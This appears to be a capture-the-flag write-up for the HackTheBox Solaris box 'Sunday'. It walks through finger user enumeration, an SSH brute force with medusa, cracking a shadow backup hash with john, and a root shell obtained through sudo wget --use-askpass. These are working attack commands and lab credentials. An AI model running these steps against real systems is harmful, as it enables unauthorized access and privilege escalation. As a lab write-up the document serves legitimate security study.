ターゲット // Sunday
PlatformHTB
OSSolaris
DifficultyEasy
IP10.129.8.23

Enumeration#

Nmap#

▶ Nmap output
PORT      STATE SERVICE VERSION
79/tcp    open  finger?
111/tcp   open  rpcbind 2-4 (RPC #100000)
515/tcp   open  printer
6787/tcp  open  http    Apache httpd
22022/tcp open  ssh     OpenSSH 8.4 (protocol 2.0)

Solaris box with an unusual port layout – SSH on 22022 and the finger service on 79.

Finger Enumeration#

The finger service leaks valid usernames. Using Metasploit’s scanner/finger/finger_users:

1
2
3

# Wordlist: /usr/share/seclists/Usernames/Names/names.txt
# Notable users found:
sammy, sunny, root

Confirming with manual finger queries:

1
2
3
4
5

finger sunny@10.129.8.23
# Login: sunny  TTY: ssh  Idle: <Apr 13, 2022> 10.10.14.13

finger sammy@10.129.8.23
# Login: sammy  TTY: ssh  Idle: <Apr 13, 2022> 10.10.14.13

Both sammy and sunny are active SSH users.

Foothold#

SSH Brute Force#

With two valid usernames and SSH on a non-standard port, brute force is worth a shot:

1
2
3

medusa -h 10.129.8.23 -u sunny -P /usr/share/wordlists/john.lst -M ssh -n 22022 -t 10 -f

ACCOUNT FOUND: [ssh] Host: 10.129.8.23 User: sunny Password: sunday [SUCCESS]

Credentials: sunny:sunday – honestly, checking {box_name} as a password would’ve saved the brute force.

Lateral Movement#

Shadow Backup → sammy#

Checking sunny’s bash history reveals breadcrumbs:

1
2
3
4

cat .bash_history
# ...
cat /backup/shadow.backup
sudo /root/troll

Following the trail:

1
2
3
4

cat /backup/shadow.backup

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Crack sammy’s hash:

1
2
3

john hash --wordlist=/usr/share/wordlists/rockyou.txt

cooldude!        (sammy)

su sammy with cooldude! – we’re in.

Privilege Escalation#

sudo wget –use-askpass#

1
2
3
4

sudo -l
# User sammy may run the following commands on sunday:
#     (ALL) ALL
#     (root) NOPASSWD: /usr/bin/wget

wget with sudo and no password is a clean GTFOBins escalation using --use-askpass:

1
2
3
4
5
6

TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
sudo /usr/bin/wget --use-askpass=$TF 0
# whoami
root

Proof#

root@sunday

# whoami
root

Key Takeaways#

[ ノート ]
  • The finger service is a goldmine for user enumeration on older systems – always check it
  • Backup shadow files with world-readable permissions are a common CTF (and real-world) finding
  • Bash history often contains hints about where to look next – check it early
  • sudo wget with --use-askpass is an underrated GTFOBins technique for privilege escalation